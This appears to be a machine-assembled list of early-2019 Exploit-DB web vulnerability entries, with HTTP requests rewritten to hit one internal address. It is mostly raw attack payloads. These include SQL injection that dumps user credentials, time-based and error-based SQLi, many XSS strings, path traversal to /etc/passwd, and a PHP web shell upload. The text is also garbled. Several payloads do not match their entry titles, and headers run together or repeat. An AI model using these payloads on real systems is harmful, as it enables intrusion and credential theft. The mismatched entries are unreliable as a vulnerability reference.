GET /10.0.100.24/index.php?module=users%2flogin HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonX-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45Content-Length: 3467DNT: 1Connection: close

Target program: Rukovoditel Project Management CRM; target environment: Rukovoditel Project Management CRM 2.4.1

2019-02-14 46377 SQL Injection (difficulty: Low, risk: Medium) WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection

POST /10.0.100.24/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim HTTP/1.1Host: 10.0.100.24:1004Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 456Content-Type: multipart/form-data;boundary=54a535315dda429db2f07895827ff1c6

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64)AppleWebKit/537.36 (KHTML,like Gecko) Chrome/54.0.2840.99 Safari/537.36

action=TRASH_RESTORE&booking_id=573) AND SLEEP(100) AND

(1=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=en_US&is_trash=1&wpbc_nonce=99c5ffaa67

Target program: WordPress Plugin Booking Calendar; target environment: WordPress Plugin Booking Calendar 8.4.3

2019-02-14 46375 XSS (difficulty: Low, risk: Low) DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting

Profile Name="><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>notes="><img src=x onerror=alert("XSSed-By-Abdul-Kareem")>

Target program: DomainMOD; target environment: DomainMOD 4.11.01

2019-02-14 46374 XSS (difficulty: Low, risk: Low) DomainMOD 4.11.01 - 'category.php CatagoryName, StakeHolder' Cross-Site Scripting

CatagoryName="><img src=xonerror=alert("Xss-By-Abdul-Raheem")>StakeHolder="><img src=xonerror=alert("Xss-By-Abdul-Raheem")>

Target program: DomainMOD; target environment: DomainMOD 4.11.01

2019-02-14 46373 XSS (difficulty: Low, risk: Low) DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting

username="><img src=xonerror=alert("Xss-By-Abdul-Raheem")>

Target program: DomainMOD; target environment: DomainMOD 4.11.01

2019-02-14 46372 XSS (difficulty: Low, risk: Low) DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting

ssl-provider-name="><img src=x onerror=alert("Xss-By-Abdul-Raheem")>ssl-provider's-url="><img src=x onerror=alert("Xss-By-Abdul-Raheem")>

Target program: DomainMOD; target environment: DomainMOD 4.11.01


2019-02-15 46389 File Upload (difficulty: Low, risk: High) UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload

POST /10.0.100.24/laravel-filemanager/upload HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0)Gecko/20100101 Firefox/54.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://10.0.100.24:1004/laravel-filemanager?type=FilesContent-Length: 527Connection: keep-alive

-----------------------------260082409123824'Content-Disposition: form-data; name="upload[]";filename="c0w.php"'Content-Type: text/plainHappy Hacking!!<?

"system($_REQUEST['cmd']);"?>------------------------------------------------260082409123824Content-Disposition: form-data; name="working_dir"/1-----------------------------260082409123824'Content-Disposition: form-data; name="type"

Files-----------------------------260082409123824Content-Disposition: form-data; name="_token"

Target program: UniSharp Laravel File Manager; target environment: UniSharp Laravel File Manager 2.0.0-alpha7

2019-02-15 46387 SQL Injection (difficulty: Low, risk: Low) qdPM 9.1 - 'search_by_extrafields[]' SQL Injection

search[keywords]=&search_by_extrafields[]=%5c

Target program: qdPM; target environment: qdPM 9.1

POST/10.0.100.24/common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1Host: 10.0.100.24:1004

Content-Length: 508Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98Safari/537.36Content-Type: multipart/form-data; boundary=----aaa

Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,vi;q=0.8Connection: close

------aaaContent-Disposition: form-data; name="sspsetup"Attach------aaaContent-Disposition: form-data; name="module"CustomLogin------aaaContent-Disposition: form-data; name="filePath";

filename="test.jsp"Content-Type: text/htmlThis is shell content------aaaContent-Disposition: form-data; name="hmtlcontent"------aaa--

2019-02-18 46408 XSS (difficulty: Low, risk: Low) Comodo Dome Firewall 2.7.0 - Cross-Site Scripting

username="><script>alert(1)</script>comment=<script>alert(2)</script>admin_name=<script>alert(3)</script>name=<script>alert(4)</script>surname=<script>alert(5)</script>newLicense=<script>alert(6)</script>organization="><script>alert(7)</script>BACKUP_RCPTTO=<script>alert(8)</script>netmask_addr=<script>alert(9)</script>

Target program: Comodo Dome Firewall; target environment: Comodo Dome Firewall 2.7.0

2019-02-18 46406 XSS (difficulty: Low, risk: Low) Apache CouchDB 2.3.0 - Cross-Site Scripting

Database = <img src=x onerror=alert(1)>Put = <img src=x onerror=alert(2)>Delete = <img src=x onerror=alert(2)>

Target program: Apache CouchDB; target environment: Apache CouchDB 2.3.0

2019-02-18 46402 SQL Injection (difficulty: Low, risk: Low) CMSsite 1.0 - 'post' SQL Injection

POST /10.0.100.24/CMSsite/post.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1

Host: localhostConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

post=1%20and%20(sleep(10))

Target program: CMSsite; target environment: CMSsite 1.0

2019-02-18 46399 XSS (difficulty: Low, risk: Low) qdPM 9.1 - 'search[keywords]' Cross-Site Scripting

POST /10.0.100.24/qdpm/index.php/users HTTP/1.1Host: 10.0.100.24:1004

Content-Length: 73Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9

Target program: qdPM; target environment: qdPM 9.1

2019-02-18 46398 XSS (difficulty: Low, risk: Low) qdPM 9.1 - 'type' Cross-Site Scripting

GET/10.0.100.24/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,

like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

Target program: qdPM; target environment: qdPM 9.1

2019-02-18 46413 File Upload (difficulty: Low, risk: High) Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload

Target program: Zoho ManageEngine ServiceDesk Plus (SDP); target environment: Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012


2019-02-19 46426 XSS (difficulty: Low, risk: Low) Ask Expert Script 3.0.5 - Cross Site Scripting

GET

/10.0.100.24/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1

Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

Target program: Ask Expert Script; target environment: Ask Expert Script 3.0.5

2019-02-19 46426 SQL Injection (difficulty: Low, risk: Low) Ask Expert Script 3.0.5 - SQL Injection

POST /10.0.100.24/list-details.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/

Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Host: localhostConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

view=select * FROM users WHERE login = "victor" ANDpassword="123"

Target program: Ask Expert Script; target environment: Ask Expert Script 3.0.5

2019-02-19 46425 Directory Traversal (difficulty: Medium, risk: Low) Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal

bussAlert=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=truecustomDev=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=trueselSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Target program: Zoho ManageEngine Netflow; target environment: Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2

2019-02-19 46425 XSS (difficulty: Low, risk: Low) Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Cross-Site Scripting

bussAlert=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fs

cript%3efc8z7&bussAlert=true

customDev=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=trueselSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Target program: Zoho ManageEngine Netflow Analyzer Professional; target environment: Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2

2019-02-19 46424 SQL Injection (difficulty: Low, risk: Low) XAMPP 5.6.8 - SQL Injection

POST /10.0.100.24/xampp/cds.php? HTTP/1.1

Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1

Host: localhostConnection: Keep-alive

Accept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)

AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984

Target program: XAMPP; target environment: XAMPP 5.6.8

2019-02-19 46424 XSS (difficulty: Low, risk: Low) XAMPP 5.6.8 - Persistent Cross-Site Scripting

GET /10.0.100.24/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29 HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

Target program: XAMPP; target environment: XAMPP 5.6.8

2019-02-19 46423 SQL Injection (difficulty: Low, risk: Low) eDirectory - SQL Injection

POST /10.0.100.24/xampp/cds-fpdf.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 45Content-Type: application/x-www-form-urlencodedReferer: http://localhost/qdPM/Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Host: localhost

Connection: Keep-aliveAccept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21

(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29

Target program: eDirectory; target environment: eDirectory

2019-02-19 46420 XSS (difficulty: Low, risk: Low) Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting

POST /10.0.100.24/gmusic/zuzconsole/___contact HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 155Accept: application/json, text/plain, */*Origin: https://demos.zuz.host

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Content-Type: application/json;charset=UTF-8Referer: https://server/gmusic/contact

Accept-Encoding: gzip, deflateX-XSS-Protection: 0

{"type":"general","name":"<script>alert(0)</script>","mail":"[email protected]","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}

Target program: Zuz Music; target environment: Zuz Music 2.1

2019-02-19 46419 SQL Injection (difficulty: Low, risk: Low) Listing Hub CMS 1.0 - 'pages.php id' SQL Injection

GET/10.0.100.24/pages.php?id=2%27%20AND%20(SELECT%204588%20FROM(SELECT%20COUNT(*),CONCAT(0x3a3a,user(),0x3a3a,database(),0x3a3a,version(),0x3a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20- HTTP/1.1

Target program: Listing Hub CMS; target environment: Listing Hub CMS 1.0

2019-02-19 46418 SQL Injection (difficulty: Medium, risk: Low) Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection

POST /10.0.100.24/find/assets/external/data_2.php HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 251Accept: application/json, text/javascript, */*; q=0.01Origin: https://themerig.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://server/find/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

cate=2.9') UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -

Target program: Find a Place CMS Directory; target environment: Find a Place CMS Directory 1.5


2019-02-20 46429 XSS (difficulty: Low, risk: Low) HotelDruid 2.3 - Cross-Site Scripting

GET /10.0.100.24/hoteldruid/visualizza_tabelle.php?nsextt=x"onmouseover=alert(0x000981) x=" HTTP/1.1Host: 10.0.100.24:1004Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

GET/10.0.100.24/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"onmouseover="alert(8562604) HTTP/1.1Host: 10.0.100.24:1004

Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21 (KHTML,like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

Target program: HotelDruid; target environment: HotelDruid 2.3

2019-02-21 46440 SQL Injection (difficulty: Medium, risk: Low) EI-Tube 3 - SQL Injection

POST /10.0.100.24/search?q=-999%22+union+select+1,user(),3,4,5,version()+%23 HTTP/1.1Host: 10.0.100.24:1004Connection: closeContent-Length: 251Accept: application/json, text/javascript, */*; q=0.01Origin: https://themerig.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://server/find/index.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

cate=2.9') UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N

ULL,NULL FROM users limit 1-- -

Target program: EI-Tube; target environment: EI-Tube 3

2019-02-22 46450 Directory Traversal (difficulty: Low, risk: Medium) Micro Focus Filr 3.4.0.217 - Path Traversal

GET/10.0.100.24/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=../../../../../../../../../../../etc/passwdHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0)Gecko/20100101Firefox/60.0Accept: */*Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflateCookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531Connection: close

Target program: Micro Focus Filr; target environment: Micro Focus Filr 3.4.0.217

2019-02-25 46457 SQL Injection (difficulty: Low, risk: Low) Advance Gift Shop Pro Script 2.0.3 - SQL Injection

GET/10.0.100.24/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product HTTP/1.1

Target program: Advance Gift Shop Pro Script; target environment: Advance Gift Shop Pro Script 2.0.3

2019-02-25 46456 SQL Injection (difficulty: Low, risk: Low) News Website Script 2.0.5 - SQL Injection

GET/10.0.100.24/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri HTTP/1.1

Target program: News Website Script; target environment: News Website Script 2.0.5

2019-02-25 46455 XSS (difficulty: Low, risk: Low) PHP Ecommerce Script 2.0.6 - Cross-Site Scripting

/10.0.100.24/?s=<scRiPt>alert(1)</ScrIpT>

Target program: PHP Ecommerce Script; target environment: PHP Ecommerce Script 2.0.6

2019-02-25 46455 SQL Injection (difficulty: Low, risk: Low) PHP Ecommerce Script 2.0.6 - SQL Injection

GET/10.0.100.24/?s=1%20and%20extractvalue(rand(),concat(0x7e,version())) HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)

Gecko/20100101 Firefox/55.0Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflateCookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Target program: PHP Ecommerce Script; target environment: PHP Ecommerce Script 2.0.6

2019-02-28 46467 SQL Injection (difficulty: Low, risk: Low) Joomla! Component J2Store < 3.3.7 - SQL Injection

POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004Content-Length: 139Content-Type: application/x-www-form-urlencodedConnection: Keep-aliveAccept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*

option=com_j2store&view=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX

Target program: Joomla! Component J2Store; target environment: Joomla! Component J2Store < 3.3.7

2019-02-28 46461 SQL Injection (difficulty: Low, risk: Low) Simple Online Hotel Reservation System - SQL Injection

GET /10.0.100.24/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20- HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Target program: Simple Online Hotel Reservation System; target environment: Simple Online Hotel Reservation System


2019-03-04 46498 XSS (difficulty: Low, risk: Medium) Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting

POST /10.0.100.24/goform/setUser HTTP/1.1Host: 10.0.100.24:1004Content-Length: 101Cache-Control: max-age=0Origin: http://192.168.1.1Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://192.168.1.1/management/account_admin.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: loginName=admin

Connection: close

account_user=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e&account_pwd=password123&account_pwd2=password123&btnApply1=Apply&curIndex=new

Target program: Fiberhome; target environment: Fiberhome AN5506-04-F RP2669

POST /10.0.100.24/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 1936DNT: 1Connection: close

CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D;1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D;1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7DUpgrade-Insecure-Requests: 1

2019-03-04 46495 XSS (difficulty: Medium, risk: Medium) Bolt CMS 3.6.4 - Cross-Site Scripting

POST /bolt/editcontent/pages HTTP/1.1Host: bolt-up3x24.bolt.dockerfly.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 562DNT: 1Connection: closeUpgrade-Insecure-Requests: 1

content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&

slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1

Target program: Bolt; target environment: Bolt CMS 3.6.4

2019-03-04 46494 Directory Traversal (difficulty: Medium, risk: Low) MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal

POST /10.0.100.24/bolt/editcontent/pages HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 562DNT: 1

Connection: close

content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1

Target program: MarcomCentral; target environment: MarcomCentral FusionPro VDP Creator < 10.0

2019-03-04 46482 SQL Injection (difficulty: Medium, risk: Medium) OOP CMS BLOG 1.0 - Multiple SQL Injection

# http://localhost/[PATH]/search.php?search=1[SQLi]&submit=Search# http://localhost/[PATH]/post.php?id=17 [SQLi]# http://localhost/[PATH]/posts.php?id=4 [SQLi]# http://localhost/[PATH]/page.php?pageid=8 [SQLi]# http://localhost/[PATH]/admin/viewUser.php?userid=34 [SQLi]

# http://localhost/[PATH]/admin/replayMsg.php?msgid=4 [SQLi]

Target program: OOP CMS BLOG; target environment: OOP CMS BLOG 1.0

2019-03-04 46481 SQL Injection (difficulty: Low, risk: Low) elFinder 2.1.47 - 'PHP connector' Command Injection

GET/10.0.100.24/php/connector.minimal.php?target=%s&width=539&heigh

t=960&degree=180&quality=100&bg=&mode=rotate&cmd=resize&reqid=169323550af10c HTTP/1.1

Target program: elFinder; target environment: elFinder 2.1.47

2019-03-04 46496 XSS (difficulty: Medium, risk: Medium) Craft CMS 3.1.12 Pro - Cross-Site Scripting

Target program: Craft; target environment: Craft CMS 3.1.12 Pro


2019-03-05 46500 SQL Injection (difficulty: Low, risk: Low) OpenDocMan 1.3.4 - 'search.php where' SQL Injection

GET/10.0.100.24/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=TrainingManual&exact_phrase=on HTTP/1.1

Target program: OpenDocMan; target environment: OpenDocMan 1.3.4

2019-03-07 46482 SQL Injection (difficulty: Medium, risk: Medium) Kados R10 GreenBee - Multiple SQL Injection

GET /10.0.100.24/search.php?search=1 [SQLi]&submit=SearchHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: _ga=GA1.2.1239644041.1549987630;

_gid=GA1.2.1694605918.1549987630Upgrade-Insecure-Requests: 1

/post.php?id=17 [SQLi]/posts.php?id=4 [SQLi]/page.php?pageid=8 [SQLi]/admin/viewUser.php?userid=34 [SQLi]/admin/replayMsg.php?msgid=4 [SQLi]

Target program: Kados; target environment: Kados R10 GreenBee

2019-03-08 46517 XSS (difficulty: Medium, risk: Medium) OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting

POST /document/demodb/-1:-1 HTTP/1.1Host: 192.168.2.101:2480User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)Gecko/20100101 Firefox/65.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.2.101:2480/studio/index.htmlX-Requested-With: XMLHttpRequestContent-Type: application/json;charset=utf-8Content-Length: 133DNT: 1

Connection: closeCookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825

